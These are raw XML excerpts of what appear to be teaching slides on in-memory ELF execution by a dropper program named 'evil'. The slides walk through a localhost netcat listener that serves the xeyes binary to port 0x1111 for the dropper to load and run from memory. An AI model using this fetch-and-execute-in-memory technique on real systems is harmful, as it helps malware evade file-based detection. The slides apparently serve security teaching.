            <a:ext cx="2847975"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手繪多邊形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="5981700"/>
            <a:ext cx="6057900" cy="609600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6057900"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 609600"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 6057900"/>
              <a:gd name="connsiteY1" fmla="*/ 609600 h 609600"/>
              <a:gd name="connsiteX2" fmla="*/ 6057900 w 6057900"/>
              <a:gd name="connsiteY2" fmla="*/ 609600 h 609600"/>
              <a:gd name="connsiteX3" fmla="*/ 6057900 w 6057900"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 609600"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6057900" h="609600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6057900" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6057900" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="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手繪多邊形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997200" y="2946400"/>
            <a:ext cx="5143500" cy="3644900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5143500"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3644900"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 5143500"/>
              <a:gd name="connsiteY1" fmla="*/ 279400 h 3644900"/>
              <a:gd name="connsiteX2" fmla="*/ 5143500 w 5143500"/>
              <a:gd name="connsiteY2" fmla="*/ 279400 h 3644900"/>
              <a:gd name="connsiteX3" fmla="*/ 5143500 w 5143500"/>
              <a:gd name="connsiteY3" fmla="*/ 1574800 h 3644900"/>
              <a:gd name="connsiteX4" fmla="*/ 2730500 w 5143500"/>
              <a:gd name="connsiteY4" fmla="*/ 1574800 h 3644900"/>
              <a:gd name="connsiteX5" fmla="*/ 2730500 w 5143500"/>
              <a:gd name="connsiteY5" fmla="*/ 3644900 h 364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43500" h="3644900">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="279400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5143500" y="279400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5143500" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2730500" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2730500" y="3644900"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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384269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6" y="2564904"/>
            <a:ext cx="8640962" cy="4032448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>This dropper connects to port 0x1111 of the local host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Here we use  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to simulate a server program which can store a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> that will be sent by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a client program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and be downloaded by the program (called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in the case) in the previous slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -l $((0x1111))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> program shown in the previous slide.</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>M0rk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="5373220"/>
            <a:ext cx="7200800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Use this pseudo terminal on the server host to simulate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a client program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="左大括弧 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="2863163" y="3520369"/>
            <a:ext cx="288034" cy="3417665"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48975"/>
              <a:gd name="adj2" fmla="val 50823"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFC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1" name="手繪多邊形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="3492499"/>
            <a:ext cx="3543300" cy="1304653"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 330200 w 3543300"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1054100"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 3543300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1054100"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 3543300"/>
              <a:gd name="connsiteY2" fmla="*/ 787400 h 1054100"/>
              <a:gd name="connsiteX3" fmla="*/ 3543300 w 3543300"/>
              <a:gd name="connsiteY3" fmla="*/ 787400 h 1054100"/>
              <a:gd name="connsiteX4" fmla="*/ 3543300 w 3543300"/>
              <a:gd name="connsiteY4" fmla="*/ 1054100 h 1054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3300" h="1054100">
                <a:moveTo>
                  <a:pt x="330200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="787400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543300" y="787400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543300" y="1054100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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578373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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Execution Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>M0rk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://img.itw01.com/images/2018/02/20/23/4825_Da8L7O_IKJHEIJ.jpg!r800x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3" y="2564904"/>
            <a:ext cx="8057445" cy="3823626"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="5373216"/>
            <a:ext cx="3332088" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1) execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> at the server host.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="手繪多邊形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324100" y="4653136"/>
            <a:ext cx="1562100" cy="782464"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1562100 w 1562100"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1041400"/>
              <a:gd name="connsiteX1" fmla="*/ 1562100 w 1562100"/>
              <a:gd name="connsiteY1" fmla="*/ 381000 h 1041400"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1562100"/>
              <a:gd name="connsiteY2" fmla="*/ 381000 h 1041400"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1562100"/>
              <a:gd name="connsiteY3" fmla="*/ 1041400 h 1041400"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1562100" h="1041400">
                <a:moveTo>
                  <a:pt x="1562100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1562100" y="381000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="381000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1041400"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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4572000" y="4914900"/>
            <a:ext cx="3952988" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(3) At the server host, send the code of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to the server port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x1111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is connecting to. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> obtains the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and stores the code in its memory, and then execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="手繪多邊形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177800" y="3263900"/>
            <a:ext cx="7353300" cy="3429000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 7353300 w 7353300"/>
              <a:gd name="connsiteY0" fmla="*/ 3086100 h 3429000"/>
              <a:gd name="connsiteX1" fmla="*/ 7353300 w 7353300"/>
              <a:gd name="connsiteY1" fmla="*/ 3429000 h 3429000"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 7353300"/>
              <a:gd name="connsiteY2" fmla="*/ 3429000 h 3429000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 7353300"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 3429000"/>
              <a:gd name="connsiteX4" fmla="*/ 215900 w 7353300"/>
              <a:gd name="connsiteY4" fmla="*/ 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53300" h="3429000">
                <a:moveTo>
                  <a:pt x="7353300" y="3086100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7353300" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215900" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="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手繪多邊形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="3314700"/>
            <a:ext cx="3898900" cy="1701800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1816100 w 3898900"/>
              <a:gd name="connsiteY0" fmla="*/ 1701800 h 1701800"/>
              <a:gd name="connsiteX1" fmla="*/ 1816100 w 3898900"/>
              <a:gd name="connsiteY1" fmla="*/ 1574800 h 1701800"/>
              <a:gd name="connsiteX2" fmla="*/ 3898900 w 3898900"/>
              <a:gd name="connsiteY2" fmla="*/ 1574800 h 1701800"/>
              <a:gd name="connsiteX3" fmla="*/ 3898900 w 3898900"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1701800"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 3898900"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1701800"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 3898900"/>
              <a:gd name="connsiteY5" fmla="*/ 102870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98900" h="1701800">
                <a:moveTo>
                  <a:pt x="1816100" y="1701800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1816100" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3898900" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3898900" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1028700"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5488384" y="2882984"/>
            <a:ext cx="2467992" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2) $ cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3194344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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>ELF in-memory Execution through Interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
